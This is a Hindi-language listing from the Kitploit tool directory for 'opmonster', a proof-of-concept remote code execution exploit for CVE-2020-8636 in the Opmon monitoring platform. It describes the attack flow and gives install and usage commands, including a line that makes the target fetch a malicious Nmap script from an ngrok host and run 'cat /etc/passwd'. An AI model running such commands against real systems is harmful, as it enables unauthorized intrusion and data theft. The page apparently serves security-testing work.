Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
opmonster — CVE-2020-8636 प्रमाणित रिमोट कोड निष्पादन शोषण Opmon के लिए | Kitploit
उपकरण/GitHubGitHub/phor3nsic/opmonster
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubphor3nsic/opmonster

opmonster

CVE-2020-8636 प्रमाणित रिमोट कोड निष्पादन शोषण Opmon के लिए

रिपॉजिटरी देखें
21 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

OpMonster

CVE-2020-8636 — Opmon के लिए प्रमाणित रिमोट कोड निष्पादन शोषण

के बारे में • स्थापना • उपयोग • लाइसेंस

language last commit license stars

OpMonster

के बारे में

OpMonster CVE-2020-8636 के लिए एक साक्ष्य-अवधारणा शोषण है, जो Opmon निगरानी प्लेटफॉर्म में एक रिमोट कोड निष्पादन भेद्यता है। यह nettools.php एंडपॉइंट का दुरुपयोग करता है, जो आपको मनमाने --script विकल्पों के साथ Nmap चलाने देता है। शोषण Opmon को आपके नियंत्रण वाले सर्वर ( http-fetch के माध्यम से) से एक दुर्भावनापूर्ण .nse Nmap स्क्रिप्ट प्राप्त करने के लिए मजबूर करता है, इसे /tmp में ड्रॉप करता है, फिर लक्ष्य पर आपका कमांड निष्पादित करने और आउटपुट प्रिंट करने के लिए इसे चलाता है।

@phor3nsic द्वारा खोजा और विकसित किया गया। अधिक जानकारी: Opmon पर तीन CVE।

स्थापना

root@kitploit:~
git clone https://github.com/phor3nsic/opmonster
cd opmonster
pip install requests

उपयोग

सबसे पहले, एक वेब सर्वर को ऐसे होस्ट पर शुरू करें जहाँ लक्ष्य पहुँच सके, ऐसी निर्देशिका में जहाँ से उत्पन्न .nse स्क्रिप्ट डाउनलोड की जा सके (शोषण स्क्रिप्ट को वर्तमान निर्देशिका में लिखता है):

root@kitploit:~
php -S 0.0.0.0:1337

फिर चार स्थितीय तर्कों के साथ शोषण चलाएं:

root@kitploit:~
python3 opmonster.py https://vulnhost.com myhost.ngrok.io 80 "cat /etc/passwd"

यदि लक्ष्य स्क्रिप्ट डाउनलोड नहीं करता ("कमजोर नहीं") या आपके सर्वर से बाहरी कनेक्शन नहीं बना सकता, तो शोषण एक संदेश के साथ रुक जाता है।

अस्वीकरण

केवल अधिकृत सुरक्षा परीक्षण और शिक्षा के लिए। इसका उपयोग कैसे करें इसकी जिम्मेदारी आपकी है।

लाइसेंस

MIT © phor3nsic

टूल डाउनलोड करें
तर्कविवरण
HOSTलक्ष्य Opmon आधार URL (उदा. https://vulnhost.com)
LHOSTआपका सर्वर होस्ट जो .nse स्क्रिप्ट प्रदान करता है
LPORTआपका सर्वर पोर्ट
CMDलक्ष्य पर निष्पादित करने के लिए कमांड